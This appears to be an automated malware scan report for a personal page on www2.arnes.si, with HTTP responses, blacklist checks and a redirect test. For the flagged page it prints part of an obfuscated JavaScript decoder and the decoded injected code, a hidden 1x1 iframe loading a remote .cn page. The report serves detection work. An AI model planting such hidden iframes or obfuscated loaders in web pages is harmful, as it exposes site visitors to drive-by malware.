Scanned pages/files
Request | Server response | Status |
http://www2.arnes.si/~bzidan | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 23 Oct 2014 08:05:18 GMT Location: http://www2.arnes.si/~bzidan/ Server: Apache Content-Length: 300 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www2.arnes.si/~bzidan/ | 200 OK Content-Length: 10689 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
function ge35ebc1854(a6cd0b741){var ab6b21af='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var k69359ed8='';var ka36c8b,d274c8b,a4430c2,h890589c2,w2c792f5d,i92032e5,d04cba01;var pea655a=0;do{h890589c2=ab6b21af.indexOf(a6cd0b741.charAt(pea655a++));w2c792f5d=ab6b21af.indexOf(a6cd0b741.charAt(pea655a++));i92032e5=ab6b21af.indexOf(a6cd0b741.charAt(pea655a++));d04cba01=ab6b21af.indexOf(a6cd0b741.charAt(pea655a++));ka36c8b=(h890589c2<<2)|(w2c792f5d>>4);d274c8b=((w2c79
Decoded script:
<iframe src="http://yt6tyg.cn/1/index.php" width="1" height="1" frameborder="0"></iframe>
Antivirus reports:
http://www2.arnes.si/~bzidan/Res/code/shared.js | 200 OK Content-Length: 5448 Content-Type: application/x-javascript | clean |
http://www2.arnes.si/Res/code/boxController.js | 404 Not Found Content-Length: 286 Content-Type: text/html | clean |
http://www2.arnes.si/test404page.js | 404 Not Found Content-Length: 275 Content-Type: text/html | clean |
http://www2.arnes.si/Res/code/boxSettings.js | 404 Not Found Content-Length: 284 Content-Type: text/html | clean |
http://www2.arnes.si/Res/tree/tree.js | 404 Not Found Content-Length: 277 Content-Type: text/html | clean |
http://www2.arnes.si/Res/tree/tree_items.js | 404 Not Found Content-Length: 283 Content-Type: text/html | clean |
http://www2.arnes.si/Res/tree/tree_tpl.js | 404 Not Found Content-Length: 281 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: www2.arnes.si
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: www2.arnes.si
Referer: http://www.google.com/search?q=www2.arnes.si
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=www2.arnes.si
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://www2.arnes.si/
Result: www2.arnes.si is not infected or malware details are not published yet.